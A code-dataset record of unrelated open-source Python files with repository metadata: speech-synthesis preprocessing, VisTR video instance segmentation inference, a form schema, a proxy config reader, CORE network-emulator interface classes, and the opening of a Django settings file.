|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 3
|
2019-12-02T00:39:35.000Z
|
2020-05-12T14:01:49.000Z
|
preprocess.py
|
yoojungsun0/multi_emotional_tacotron
|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 2
|
2020-03-24T17:55:12.000Z
|
2020-03-31T10:23:45.000Z
|
preprocess.py
|
yoojungsun0/multi-emotional-tacotron
|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 1
|
2020-06-09T03:24:11.000Z
|
2020-06-09T03:24:11.000Z
|
# coding: utf-8
"""
python preprocess.py --num_workers 10 --name son --in_dir .\datasets\son --out_dir .\data\son
python preprocess.py --num_workers 10 --name moon --in_dir .\datasets\moon --out_dir .\data\moon
==> out_dir에 'audio', 'mel', 'linear', 'time_steps', 'mel_frames', 'text', 'tokens', 'loss_coeff'를 묶은 npz파일이 생성된다.
"""
import argparse
import os
from multiprocessing import cpu_count
from tqdm import tqdm
import importlib
from hparams import hparams, hparams_debug_string
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
def preprocess(mod, in_dir, out_root,num_workers):
os.makedirs(out_dir, exist_ok=True)
metadata = mod.build_from_path(hparams, in_dir, out_dir,num_workers=num_workers, tqdm=tqdm)
write_metadata(metadata, out_dir)
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write('|'.join([str(x) for x in m]) + '\n')
mel_frames = sum([int(m[4]) for m in metadata])
timesteps = sum([int(m[3]) for m in metadata])
sr = hparams.sample_rate
hours = timesteps / sr / 3600
print('Write {} utterances, {} mel frames, {} audio timesteps, ({:.2f} hours)'.format(len(metadata), mel_frames, timesteps, hours))
print('Max input length (text chars): {}'.format(max(len(m[5]) for m in metadata)))
print('Max mel frames length: {}'.format(max(int(m[4]) for m in metadata)))
print('Max audio timesteps length: {}'.format(max(m[3] for m in metadata)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--name', type=str, default=None)
parser.add_argument('--in_dir', type=str, default=None)
parser.add_argument('--out_dir', type=str, default=None)
parser.add_argument('--num_workers', type=str, default=None)
parser.add_argument('--hparams', type=str, default=None)
args = parser.parse_args()
if args.hparams is not None:
hparams.parse(args.hparams)
print(hparams_debug_string())
name = args.name
in_dir = args.in_dir
out_dir = args.out_dir
num_workers = args.num_workers
num_workers = cpu_count() if num_workers is None else int(num_workers) # cpu_count() = process 갯수
print("Sampling frequency: {}".format(hparams.sample_rate))
assert name in ["cmu_arctic", "ljspeech", "son", "moon","angry","fear","happy","neutral","sad","surprise","YAF_angry","YAF_disgust","YAF_fear","YAF_happy","YAF_neutral","YAF_pleasant_surprised","YAF_sad"]
mod = importlib.import_module('datasets.{}'.format(name))
preprocess(mod, in_dir, out_dir, num_workers)
| 42.854839
| 208
| 0.693263
|
031d3aa4c3fac8d5b517e9bfdc3071dcbbbb4d55
| 11,544
|
py
|
Python
|
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
'''
Inference code for VisTR
Modified from DETR (https://github.com/facebookresearch/detr)
'''
import argparse
import datetime
import json
import random
import time
from pathlib import Path
import numpy as np
import torch
from torch.utils.data import DataLoader, DistributedSampler
import datasets
import util.misc as utils
from datasets import build_dataset, get_coco_api_from_dataset
from engine import evaluate, train_one_epoch
from models import build_model
import torchvision.transforms as T
import matplotlib.pyplot as plt
import os
from PIL import Image
import math
import torch.nn.functional as F
import json
from scipy.optimize import linear_sum_assignment
import pycocotools.mask as mask_util
def get_args_parser():
parser = argparse.ArgumentParser('Set transformer detector', add_help=False)
parser.add_argument('--lr', default=1e-4, type=float)
parser.add_argument('--lr_backbone', default=1e-5, type=float)
parser.add_argument('--batch_size', default=2, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument('--epochs', default=150, type=int)
parser.add_argument('--lr_drop', default=100, type=int)
parser.add_argument('--clip_max_norm', default=0.1, type=float,
help='gradient clipping max norm')
# Model parameters
parser.add_argument('--model_path', type=str, default=None,
help="Path to the model weights.")
# * Backbone
parser.add_argument('--backbone', default='resnet101', type=str,
help="Name of the convolutional backbone to use")
parser.add_argument('--dilation', action='store_true',
help="If true, we replace stride with dilation in the last convolutional block (DC5)")
parser.add_argument('--position_embedding', default='sine', type=str, choices=('sine', 'learned'),
help="Type of positional embedding to use on top of the image features")
# * Transformer
parser.add_argument('--enc_layers', default=6, type=int,
help="Number of encoding layers in the transformer")
parser.add_argument('--dec_layers', default=6, type=int,
help="Number of decoding layers in the transformer")
parser.add_argument('--dim_feedforward', default=2048, type=int,
help="Intermediate size of the feedforward layers in the transformer blocks")
parser.add_argument('--hidden_dim', default=384, type=int,
help="Size of the embeddings (dimension of the transformer)")
parser.add_argument('--dropout', default=0.1, type=float,
help="Dropout applied in the transformer")
parser.add_argument('--nheads', default=8, type=int,
help="Number of attention heads inside the transformer's attentions")
parser.add_argument('--num_frames', default=36, type=int,
help="Number of frames")
parser.add_argument('--num_ins', default=10, type=int,
help="Number of instances")
parser.add_argument('--num_queries', default=360, type=int,
help="Number of query slots")
parser.add_argument('--pre_norm', action='store_true')
# * Segmentation
parser.add_argument('--masks', action='store_true',
help="Train segmentation head if the flag is provided")
# Loss
parser.add_argument('--no_aux_loss', dest='aux_loss', action='store_false',
help="Disables auxiliary decoding losses (loss at each layer)")
# * Matcher
parser.add_argument('--set_cost_class', default=1, type=float,
help="Class coefficient in the matching cost")
parser.add_argument('--set_cost_bbox', default=5, type=float,
help="L1 box coefficient in the matching cost")
parser.add_argument('--set_cost_giou', default=2, type=float,
help="giou box coefficient in the matching cost")
# * Loss coefficients
parser.add_argument('--mask_loss_coef', default=1, type=float)
parser.add_argument('--dice_loss_coef', default=1, type=float)
parser.add_argument('--bbox_loss_coef', default=5, type=float)
parser.add_argument('--giou_loss_coef', default=2, type=float)
parser.add_argument('--eos_coef', default=0.1, type=float,
help="Relative classification weight of the no-object class")
# dataset parameters
parser.add_argument('--img_path', default='data/ytvos/valid/JPEGImages/')
parser.add_argument('--ann_path', default='data/ytvos/annotations/instances_val_sub.json')
parser.add_argument('--save_path', default='results.json')
parser.add_argument('--dataset_file', default='ytvos')
parser.add_argument('--coco_path', type=str)
parser.add_argument('--coco_panoptic_path', type=str)
parser.add_argument('--remove_difficult', action='store_true')
parser.add_argument('--output_dir', default='output_ytvos',
help='path where to save, empty for no saving')
parser.add_argument('--device', default='cuda',
help='device to use for training / testing')
parser.add_argument('--seed', default=42, type=int)
parser.add_argument('--resume', default='', help='resume from checkpoint')
parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
help='start epoch')
#parser.add_argument('--eval', action='store_true')
parser.add_argument('--eval', action='store_false')
parser.add_argument('--num_workers', default=0, type=int)
# distributed training parameters
parser.add_argument('--world_size', default=1, type=int,
help='number of distributed processes')
parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')
return parser
CLASSES=['person','giant_panda','lizard','parrot','skateboard','sedan','ape',
'dog','snake','monkey','hand','rabbit','duck','cat','cow','fish',
'train','horse','turtle','bear','motorbike','giraffe','leopard',
'fox','deer','owl','surfboard','airplane','truck','zebra','tiger',
'elephant','snowboard','boat','shark','mouse','frog','eagle','earless_seal',
'tennis_racket']
COLORS = [[0.000, 0.447, 0.741], [0.850, 0.325, 0.098], [0.929, 0.694, 0.125],
[0.494, 0.184, 0.556], [0.466, 0.674, 0.188], [0.301, 0.745, 0.933],
[0.494, 0.000, 0.556], [0.494, 0.000, 0.000], [0.000, 0.745, 0.000],
[0.700, 0.300, 0.600]]
transform = T.Compose([
T.Resize(300),
T.ToTensor(),
T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
# for output bounding box post-processing
def box_cxcywh_to_xyxy(x):
x_c, y_c, w, h = x.unbind(1)
b = [(x_c - 0.5 * w), (y_c - 0.5 * h),
(x_c + 0.5 * w), (y_c + 0.5 * h)]
return torch.stack(b, dim=1)
def rescale_bboxes(out_bbox, size):
img_w, img_h = size
b = box_cxcywh_to_xyxy(out_bbox)
b = b.cpu() * torch.tensor([img_w, img_h, img_w, img_h], dtype=torch.float32)
return b
def main(args):
# Test
start_time = time.time()
device = torch.device(args.device)
# fix the seed for reproducibility
seed = args.seed + utils.get_rank()
torch.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
num_frames = args.num_frames
num_ins = args.num_ins
with torch.no_grad():
model, criterion, postprocessors = build_model(args)
model.to(device)
state_dict = torch.load(args.model_path)['model']
model.load_state_dict(state_dict)
folder = args.img_path
videos = json.load(open(args.ann_path,'rb'))['videos']
vis_num = len(videos)
# Test
process_start_time = time.time()
inference_time_acc = 0.0
frame_count = 0
vis_num = 10
result = []
for i in range(vis_num):
print("Process video: ",i)
id_ = videos[i]['id']
length = videos[i]['length']
file_names = videos[i]['file_names']
clip_num = math.ceil(length/num_frames)
img_set=[]
if length<num_frames:
clip_names = file_names*(math.ceil(num_frames/length))
clip_names = clip_names[:num_frames]
else:
clip_names = file_names[:num_frames]
if len(clip_names)==0:
continue
if len(clip_names)<num_frames:
clip_names.extend(file_names[:num_frames-len(clip_names)])
for k in range(num_frames):
im = Image.open(os.path.join(folder,clip_names[k]))
img_set.append(transform(im).unsqueeze(0).cuda())
img=torch.cat(img_set,0)
# Test
frame_count += len(img_set)
inference_start_time = time.time()
# inference time is calculated for this operation
outputs = model(img)
inference_time_acc += time.time() - inference_start_time
# end of model inference
logits, boxes, masks = outputs['pred_logits'].softmax(-1)[0,:,:-1], outputs['pred_boxes'][0], outputs['pred_masks'][0]
pred_masks =F.interpolate(masks.reshape(num_frames,num_ins,masks.shape[-2],masks.shape[-1]),(im.size[1],im.size[0]),mode="bilinear").sigmoid().cpu().detach().numpy()>0.5
pred_logits = logits.reshape(num_frames,num_ins,logits.shape[-1]).cpu().detach().numpy()
pred_masks = pred_masks[:length]
pred_logits = pred_logits[:length]
pred_scores = np.max(pred_logits,axis=-1)
pred_logits = np.argmax(pred_logits,axis=-1)
for m in range(num_ins):
if pred_masks[:,m].max()==0:
continue
score = pred_scores[:,m].mean()
#category_id = pred_logits[:,m][pred_scores[:,m].argmax()]
category_id = np.argmax(np.bincount(pred_logits[:,m]))
instance = {'video_id':id_, 'score':float(score), 'category_id':int(category_id)}
segmentation = []
for n in range(length):
if pred_scores[n,m]<0.001:
segmentation.append(None)
else:
mask = (pred_masks[n,m]).astype(np.uint8)
rle = mask_util.encode(np.array(mask[:,:,np.newaxis], order='F'))[0]
rle["counts"] = rle["counts"].decode("utf-8")
segmentation.append(rle)
instance['segmentations'] = segmentation
result.append(instance)
# Test
print('Inference time: ', inference_time_acc)
print('Frame count: ', frame_count)
print('Inference time per frame: ', inference_time_acc / frame_count)
print('Process time (include image read, copy to cuda, but not model build): ', time.time() - process_start_time)
with open(args.save_path, 'w', encoding='utf-8') as f:
json.dump(result,f)
# Test
print('Total runtime (model build + inference + image read + copy to cuda ...): ', time.time() - start_time)
if __name__ == '__main__':
parser = argparse.ArgumentParser('VisTR inference script', parents=[get_args_parser()])
args = parser.parse_args()
main(args)
| 43.727273
| 181
| 0.615731
|
5ec383f21b463750485cbd3190ff312add2248d5
| 141
|
py
|
Python
|
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | null | null | null |
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | null | null | null |
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | 1
|
2022-01-14T00:33:18.000Z
|
2022-01-14T00:33:18.000Z
|
# Helper cli to encode urls.
from tentaclio.__main__ import main
if __name__ == "__main__":
main(prog_name="python -m tentaclio-gs")
| 15.666667
| 44
| 0.716312
|
b47cce4ceaeb6d6f280059f708ff8cb6b0dfd18c
| 777
|
py
|
Python
|
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | null | null | null |
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | 7
|
2020-01-23T00:50:39.000Z
|
2020-04-18T20:34:40.000Z
|
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from marshmallow import Schema, fields, validates_schema, ValidationError, pre_load, validates, RAISE
from marshmallow.validate import Regexp, Length
class MinecraftFormSchema(Schema):
minecraft_name = fields.Str(required=True, validate=[Length(min=3, max=16), Regexp("^[A-Za-z0-9_]*$")])
password = fields.Str(required=True, validate=Length(min=6))
password_verify = fields.Str(load_only=True, required=True, validate=Length(min=6))
submit = fields.Str(load_only=True, required=False, allow_none=True)
@validates_schema
def validate_password(self, data, **kwargs):
if data["password"] != data["password_verify"]:
raise ValidationError("Passwords do not match!")
class Meta:
unknown = RAISE
| 35.318182
| 107
| 0.715573
|
ccb55ad8d96015715d4174d24b9da926cbfbffbf
| 878
|
py
|
Python
|
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | 1
|
2018-01-24T10:47:52.000Z
|
2018-01-24T10:47:52.000Z
|
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | null | null | null |
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | null | null | null |
import configparser
conf=configparser.ConfigParser()
conf.read('./proxy.conf')
def get_redis(name):
redis_conf = conf.get('redis', name)
t1, t2 = redis_conf.strip().split(':')[-2:]
password, host = t1.strip().split('@')
port, db = t2.strip().split('/')
return {'host': host,
'port': int(port),
'password': password or None,
'db': int(db)}
def get_proxy_url(name=None):
if name is None:
return list(zip(*conf.items('proxy_url')))[1]
else:
if conf.has_option('proxy_url', name):
return conf.get('proxy_url', name)
else:
return None
def get_check(option=None):
if option is None:
return dict(conf.items('check'))
else:
if conf.has_option('check', option):
return conf.get('check', option)
else:
return None
| 25.085714
| 53
| 0.56492
|
7fda18c78f0939ab624b76eaa142fde7a5409e8d
| 19,434
|
py
|
Python
|
daemon/core/nodes/interface.py
|
ruohonej/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | 1
|
2022-02-12T06:34:49.000Z
|
2022-02-12T06:34:49.000Z
|
daemon/core/nodes/interface.py
|
kestasjk/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/nodes/interface.py
|
kestasjk/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | null | null | null |
"""
virtual ethernet classes that implement the interfaces available under Linux.
"""
import logging
import time
from pathlib import Path
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Tuple
import netaddr
from core import utils
from core.emulator.data import LinkOptions
from core.emulator.enumerations import TransportType
from core.errors import CoreCommandError, CoreError
from core.nodes.netclient import LinuxNetClient, get_net_client
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
from core.nodes.base import CoreNetworkBase, CoreNode
DEFAULT_MTU: int = 1500
class CoreInterface:
"""
Base class for network interfaces.
"""
def __init__(
self,
session: "Session",
name: str,
localname: str,
mtu: int = DEFAULT_MTU,
server: "DistributedServer" = None,
node: "CoreNode" = None,
) -> None:
"""
Creates a CoreInterface instance.
:param session: core session instance
:param name: interface name
:param localname: interface local name
:param mtu: mtu value
:param server: remote server node will run on, default is None for localhost
:param node: node for interface
"""
if len(name) >= 16:
raise CoreError(f"interface name ({name}) too long, max 16")
if len(localname) >= 16:
raise CoreError(f"interface local name ({localname}) too long, max 16")
self.session: "Session" = session
self.node: Optional["CoreNode"] = node
self.name: str = name
self.localname: str = localname
self.up: bool = False
self.mtu: int = mtu
self.net: Optional[CoreNetworkBase] = None
self.othernet: Optional[CoreNetworkBase] = None
self._params: Dict[str, float] = {}
self.ip4s: List[netaddr.IPNetwork] = []
self.ip6s: List[netaddr.IPNetwork] = []
self.mac: Optional[netaddr.EUI] = None
# placeholder position hook
self.poshook: Callable[[CoreInterface], None] = lambda x: None
# used with EMANE
self.transport_type: TransportType = TransportType.VIRTUAL
# id of interface for node
self.node_id: Optional[int] = None
# id of interface for network
self.net_id: Optional[int] = None
# id used to find flow data
self.flow_id: Optional[int] = None
self.server: Optional["DistributedServer"] = server
self.net_client: LinuxNetClient = get_net_client(
self.session.use_ovs(), self.host_cmd
)
self.control: bool = False
def host_cmd(
self,
args: str,
env: Dict[str, str] = None,
cwd: Path = None,
wait: bool = True,
shell: bool = False,
) -> str:
"""
Runs a command on the host system or distributed server.
:param args: command to run
:param env: environment to run command with
:param cwd: directory to run command in
:param wait: True to wait for status, False otherwise
:param shell: True to use shell, False otherwise
:return: combined stdout and stderr
:raises CoreCommandError: when a non-zero exit status occurs
"""
if self.server is None:
return utils.cmd(args, env, cwd, wait, shell)
else:
return self.server.remote_cmd(args, env, cwd, wait)
def startup(self) -> None:
"""
Startup method for the interface.
:return: nothing
"""
pass
def shutdown(self) -> None:
"""
Shutdown method for the interface.
:return: nothing
"""
pass
def attachnet(self, net: "CoreNetworkBase") -> None:
"""
Attach network.
:param net: network to attach
:return: nothing
"""
if self.net:
self.detachnet()
self.net = None
net.attach(self)
self.net = net
def detachnet(self) -> None:
"""
Detach from a network.
:return: nothing
"""
if self.net is not None:
self.net.detach(self)
def add_ip(self, ip: str) -> None:
"""
Add ip address in the format "10.0.0.1/24".
:param ip: ip address to add
:return: nothing
:raises CoreError: when ip address provided is invalid
"""
try:
ip = netaddr.IPNetwork(ip)
address = str(ip.ip)
if netaddr.valid_ipv4(address):
self.ip4s.append(ip)
else:
self.ip6s.append(ip)
except netaddr.AddrFormatError as e:
raise CoreError(f"adding invalid address {ip}: {e}")
def remove_ip(self, ip: str) -> None:
"""
Remove ip address in the format "10.0.0.1/24".
:param ip: ip address to delete
:return: nothing
:raises CoreError: when ip address provided is invalid
"""
try:
ip = netaddr.IPNetwork(ip)
address = str(ip.ip)
if netaddr.valid_ipv4(address):
self.ip4s.remove(ip)
else:
self.ip6s.remove(ip)
except (netaddr.AddrFormatError, ValueError) as e:
raise CoreError(f"deleting invalid address {ip}: {e}")
def get_ip4(self) -> Optional[netaddr.IPNetwork]:
"""
Looks for the first ip4 address.
:return: ip4 address, None otherwise
"""
return next(iter(self.ip4s), None)
def get_ip6(self) -> Optional[netaddr.IPNetwork]:
"""
Looks for the first ip6 address.
:return: ip6 address, None otherwise
"""
return next(iter(self.ip6s), None)
def ips(self) -> List[netaddr.IPNetwork]:
"""
Retrieve a list of all ip4 and ip6 addresses combined.
:return: ip4 and ip6 addresses
"""
return self.ip4s + self.ip6s
def set_mac(self, mac: Optional[str]) -> None:
"""
Set mac address.
:param mac: mac address to set, None for random mac
:return: nothing
:raises CoreError: when there is an invalid mac address
"""
if mac is None:
self.mac = mac
else:
try:
self.mac = netaddr.EUI(mac, dialect=netaddr.mac_unix_expanded)
except netaddr.AddrFormatError as e:
raise CoreError(f"invalid mac address({mac}): {e}")
def getparam(self, key: str) -> float:
"""
Retrieve a parameter from the, or None if the parameter does not exist.
:param key: parameter to get value for
:return: parameter value
"""
return self._params.get(key)
def get_link_options(self, unidirectional: int) -> LinkOptions:
"""
Get currently set params as link options.
:param unidirectional: unidirectional setting
:return: link options
"""
delay = self.getparam("delay")
if delay is not None:
delay = int(delay)
bandwidth = self.getparam("bw")
if bandwidth is not None:
bandwidth = int(bandwidth)
dup = self.getparam("duplicate")
if dup is not None:
dup = int(dup)
jitter = self.getparam("jitter")
if jitter is not None:
jitter = int(jitter)
buffer = self.getparam("buffer")
if buffer is not None:
buffer = int(buffer)
return LinkOptions(
delay=delay,
bandwidth=bandwidth,
dup=dup,
jitter=jitter,
loss=self.getparam("loss"),
buffer=buffer,
unidirectional=unidirectional,
)
def getparams(self) -> List[Tuple[str, float]]:
"""
Return (key, value) pairs for parameters.
"""
parameters = []
for k in sorted(self._params.keys()):
parameters.append((k, self._params[k]))
return parameters
def setparam(self, key: str, value: float) -> bool:
"""
Set a parameter value, returns True if the parameter has changed.
:param key: parameter name to set
:param value: parameter value
:return: True if parameter changed, False otherwise
"""
# treat None and 0 as unchanged values
logger.debug("setting param: %s - %s", key, value)
if value is None or value < 0:
return False
current_value = self._params.get(key)
if current_value is not None and current_value == value:
return False
self._params[key] = value
return True
def swapparams(self, name: str) -> None:
"""
Swap out parameters dict for name. If name does not exist,
intialize it. This is for supporting separate upstream/downstream
parameters when two layer-2 nodes are linked together.
:param name: name of parameter to swap
:return: nothing
"""
tmp = self._params
if not hasattr(self, name):
setattr(self, name, {})
self._params = getattr(self, name)
setattr(self, name, tmp)
def setposition(self) -> None:
"""
Dispatch position hook handler when possible.
:return: nothing
"""
if self.poshook and self.node:
self.poshook(self)
def __lt__(self, other: "CoreInterface") -> bool:
"""
Used for comparisons of this object.
:param other: other interface
:return: true if less than, false otherwise
"""
return id(self) < id(other)
def is_raw(self) -> bool:
"""
Used to determine if this interface is considered a raw interface.
:return: True if raw interface, False otherwise
"""
return self.transport_type == TransportType.RAW
def is_virtual(self) -> bool:
"""
Used to determine if this interface is considered a virtual interface.
:return: True if virtual interface, False otherwise
"""
return self.transport_type == TransportType.VIRTUAL
class Veth(CoreInterface):
"""
Provides virtual ethernet functionality for core nodes.
"""
def adopt_node(self, iface_id: int, name: str, start: bool) -> None:
"""
Adopt this interface to the provided node, configuring and associating
with the node as needed.
:param iface_id: interface id for node
:param name: name of interface fo rnode
:param start: True to start interface, False otherwise
:return: nothing
"""
if start:
self.startup()
self.net_client.device_ns(self.name, str(self.node.pid))
self.node.node_net_client.checksums_off(self.name)
self.flow_id = self.node.node_net_client.get_ifindex(self.name)
logger.debug("interface flow index: %s - %s", self.name, self.flow_id)
mac = self.node.node_net_client.get_mac(self.name)
logger.debug("interface mac: %s - %s", self.name, mac)
self.set_mac(mac)
self.node.node_net_client.device_name(self.name, name)
self.name = name
try:
self.node.add_iface(self, iface_id)
except CoreError as e:
self.shutdown()
raise e
def startup(self) -> None:
"""
Interface startup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.net_client.create_veth(self.localname, self.name)
if self.mtu > 0:
self.net_client.set_mtu(self.name, self.mtu)
self.net_client.set_mtu(self.localname, self.mtu)
self.net_client.device_up(self.localname)
self.up = True
def shutdown(self) -> None:
"""
Interface shutdown logic.
:return: nothing
"""
if not self.up:
return
if self.node:
try:
self.node.node_net_client.device_flush(self.name)
except CoreCommandError:
pass
if self.localname:
try:
self.net_client.delete_device(self.localname)
except CoreCommandError:
pass
self.up = False
class TunTap(CoreInterface):
"""
TUN/TAP virtual device in TAP mode
"""
def startup(self) -> None:
"""
Startup logic for a tunnel tap.
:return: nothing
"""
# TODO: more sophisticated TAP creation here
# Debian does not support -p (tap) option, RedHat does.
# For now, this is disabled to allow the TAP to be created by another
# system (e.g. EMANE"s emanetransportd)
# check_call(["tunctl", "-t", self.name])
# self.install()
self.up = True
def shutdown(self) -> None:
"""
Shutdown functionality for a tunnel tap.
:return: nothing
"""
if not self.up:
return
try:
self.node.node_net_client.device_flush(self.name)
except CoreCommandError:
logger.exception("error shutting down tunnel tap")
self.up = False
def waitfor(
self, func: Callable[[], int], attempts: int = 10, maxretrydelay: float = 0.25
) -> bool:
"""
Wait for func() to return zero with exponential backoff.
:param func: function to wait for a result of zero
:param attempts: number of attempts to wait for a zero result
:param maxretrydelay: maximum retry delay
:return: True if wait succeeded, False otherwise
"""
delay = 0.01
result = False
for i in range(1, attempts + 1):
r = func()
if r == 0:
result = True
break
msg = f"attempt {i} failed with nonzero exit status {r}"
if i < attempts + 1:
msg += ", retrying..."
logger.info(msg)
time.sleep(delay)
delay += delay
if delay > maxretrydelay:
delay = maxretrydelay
else:
msg += ", giving up"
logger.info(msg)
return result
def waitfordevicelocal(self) -> None:
"""
Check for presence of a local device - tap device may not
appear right away waits
:return: wait for device local response
"""
logger.debug("waiting for device local: %s", self.localname)
def localdevexists():
try:
self.net_client.device_show(self.localname)
return 0
except CoreCommandError:
return 1
self.waitfor(localdevexists)
def waitfordevicenode(self) -> None:
"""
Check for presence of a node device - tap device may not appear right away waits.
:return: nothing
"""
logger.debug("waiting for device node: %s", self.name)
def nodedevexists():
try:
self.node.node_net_client.device_show(self.name)
return 0
except CoreCommandError:
return 1
count = 0
while True:
result = self.waitfor(nodedevexists)
if result:
break
# TODO: emane specific code
# check if this is an EMANE interface; if so, continue
# waiting if EMANE is still running
should_retry = count < 5
is_emane = self.session.emane.is_emane_net(self.net)
is_emane_running = self.session.emane.emanerunning(self.node)
if all([should_retry, is_emane, is_emane_running]):
count += 1
else:
raise RuntimeError("node device failed to exist")
def install(self) -> None:
"""
Install this TAP into its namespace. This is not done from the
startup() method but called at a later time when a userspace
program (running on the host) has had a chance to open the socket
end of the TAP.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
self.waitfordevicelocal()
netns = str(self.node.pid)
self.net_client.device_ns(self.localname, netns)
self.node.node_net_client.device_name(self.localname, self.name)
self.node.node_net_client.device_up(self.name)
def set_ips(self) -> None:
"""
Set interface ip addresses.
:return: nothing
"""
self.waitfordevicenode()
for ip in self.ips():
self.node.node_net_client.create_address(self.name, str(ip))
class GreTap(CoreInterface):
"""
GRE TAP device for tunneling between emulation servers.
Uses the "gretap" tunnel device type from Linux which is a GRE device
having a MAC address. The MAC address is required for bridging.
"""
def __init__(
self,
session: "Session",
remoteip: str,
key: int = None,
node: "CoreNode" = None,
mtu: int = DEFAULT_MTU,
_id: int = None,
localip: str = None,
ttl: int = 255,
server: "DistributedServer" = None,
) -> None:
"""
Creates a GreTap instance.
:param session: core session instance
:param remoteip: remote address
:param key: gre tap key
:param node: related core node
:param mtu: interface mtu
:param _id: object id
:param localip: local address
:param ttl: ttl value
:param server: remote server node
will run on, default is None for localhost
:raises CoreCommandError: when there is a command exception
"""
if _id is None:
_id = ((id(self) >> 16) ^ (id(self) & 0xFFFF)) & 0xFFFF
self.id: int = _id
sessionid = session.short_session_id()
localname = f"gt.{self.id}.{sessionid}"
name = f"{localname}p"
super().__init__(session, name, localname, mtu, server, node)
self.transport_type: TransportType = TransportType.RAW
self.remote_ip: str = remoteip
self.ttl: int = ttl
self.key: Optional[int] = key
self.local_ip: Optional[str] = localip
def startup(self) -> None:
"""
Startup logic for a GreTap.
:return: nothing
"""
self.net_client.create_gretap(
self.localname, self.remote_ip, self.local_ip, self.ttl, self.key
)
if self.mtu > 0:
self.net_client.set_mtu(self.localname, self.mtu)
self.net_client.device_up(self.localname)
self.up = True
def shutdown(self) -> None:
"""
Shutdown logic for a GreTap.
:return: nothing
"""
if self.localname:
try:
self.net_client.device_down(self.localname)
self.net_client.delete_device(self.localname)
except CoreCommandError:
logger.exception("error during shutdown")
self.localname = None
| 31.194222
| 89
| 0.572605
|
d4762f5fa375e4386805e9026e40b062b34d8858
| 4,933
|
py
|
Python
|
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
config/settings.py
|
ozknightwalker/Djongo-tutorial
|
6d1d86c133924a09da2832d6125966cedeff6365
|
[
"MIT"
] | null | null | null |
"""
Django settings for DjongoTutorial project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-a_+k(o5w_axl+o)q39iok01_$+(*%zs$fxosi+7d4h%kzsd'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# third-party applications
"rest_framework",
"drf_yasg",
"channels",
# custom apps
"apps.core",
"apps.cards",
"apps.public_chat",
"apps.api",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
